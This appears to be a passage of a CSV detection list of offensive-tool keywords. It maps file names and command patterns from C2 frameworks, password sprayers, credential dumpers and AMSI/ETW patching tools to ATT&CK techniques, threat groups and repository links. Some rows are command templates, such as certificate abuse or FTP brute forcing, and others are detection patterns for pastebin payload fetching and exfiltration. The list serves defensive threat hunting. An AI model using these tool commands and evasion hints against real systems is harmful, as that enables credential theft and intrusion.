+"*passphrase-wordlist*","offensive_tool_keyword","passphrase-wordlist","This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. 
The rules will create over 1.000 permutations of each phase.","T1003 - T1110 - T1113 - T1137","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/initstring/passphrase-wordlist","1","0","N/A","N/A","10","992","149","2023-03-16T03:22:53Z","2017-12-05T20:53:13Z"
+"*pass-station search tomcat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*PassTheCert.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*passthecert.py -action add_computer -crt user.crt -key user.key -domain * -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*PassTheChallenge.cpp*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z"
+"*PassTheChallenge.exe*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z"
+"*PassTheChallenge.pdb*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z"
+"*PassTheChallenge.sln*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z"
+"*PassTheChallenge.vcxproj*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z"
+"*passthehashbrowns/BOFMask*","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","1","94","24","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z"
+"*passware-kit-forensic.sls*","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the 
complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*PasswareKitForensic_*_Setup.dmg*","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*PasswareKitForensic_*_Setup.msi*","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*passware-kit-forensic-64bit.msi*","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*passwd*john*","greyware_tool_keyword","passwd","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 
- T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*password = 'tdragon6'*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*Password*Winter2017*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*password_box.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*password_cracker.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*password_crackers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Password_Cracking.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*password_prompt_spoof.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*password|passwort|passwd|*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*PasswordBoxImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*Password-Default/service.txt*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*passwordfox.exe*","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*passwordfox.zip*","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. 
and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*passwordfox-x64.zip*","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Passwords/Leaked-Databases*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Passwords_in_description.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Password-Scripts*","offensive_tool_keyword","Password-Scripts","Password Scripts xploitation ","T1210 - T1555 - T1110 
- T1554 - T1553","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/laconicwolf/Password-Scripts","1","0","N/A","N/A","1","99","37","2019-10-08T17:57:49Z","2017-10-20T17:17:23Z"
+"*PasswordSpray *","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!","t1110 - T1114 - T1555","TA0006 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","1498","354","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z"
+"*passwordspray*--user-as-pass*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
+"*passwordspray.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
+"*passwordSprayCmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
+"*pastebin.com*/raw/* ","greyware_tool_keyword","pastebin","pastebin raw access content - abused by malwares to retrieve payloads","T1119","TA0009","Redline Stealer","N/A","Collection","pastebin.com","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*pastebin.com*/rw/*","greyware_tool_keyword","pastebin","pastebin raw access content - abused by malwares to retrieve 
payloads","T1119","TA0009","Redline Stealer","N/A","Collection","pastebin.com","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*pastebin.com*api/api_post.php*","greyware_tool_keyword","pastebin","pastebin POST url - abused by malwares to exfiltrate informations","T1102 - T1048 - T1094 - T1608.001","TA0011","N/A","N/A","Data Exfiltration","pastebin.com","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*pasv and port both active*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z"
+"*patator ftp_login host=* user=FILE0 0=*.txt *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*patator*","offensive_tool_keyword","patator","Patator was written out of frustration from using Hydra. Medusa. Ncrack. Metasploit modules and Nmap NSE scripts for password guessing attacks. I opted for a different approach in order to not create yet another brute-forcing tool and avoid repeating the same shortcomings. Patator is a multi-threaded tool written in Python. 
that strives to be more reliable and flexible than his fellow predecessors.","T1110 - T1111 - T1210 - T1558.004","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/lanjelot/patator","1","0","N/A","N/A","10","3284","776","2023-09-25T06:06:20Z","2014-08-25T00:56:21Z" +"*Patch-AMSI.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*patchAmsiOpenSession*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","363","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" +"*Patch-ETW.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - 
TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*Pateensy/PaensyLib/*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*--path docToDump.xls*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*path_dll_hijack.h*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","0","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*pathhijack.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*PaulSec/twittor*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","254","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" +"*PayGen*python3 generate.py*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","0","N/A","N/A",,"N/A",,, +"*payload start tetanus*","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://github.com/MythicAgents/tetanus","1","0","N/A","N/A","3","229","33","2023-05-14T21:34:20Z","2022-03-07T20:35:33Z" +"*payload.c *","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" +"*payload.csproj*","offensive_tool_keyword","scshell","network pentestration test (shell)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation 
tools","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z"
+"*payload.sct *","offensive_tool_keyword","scshell","network pentestration test (shell)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z"
+"*payload/encryptor_remote.py*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z"
+"*payload_bootstrap_hint*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*payload_creator.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*payload_encryption.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*payload_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*payload_local*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*payload_msf.c*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
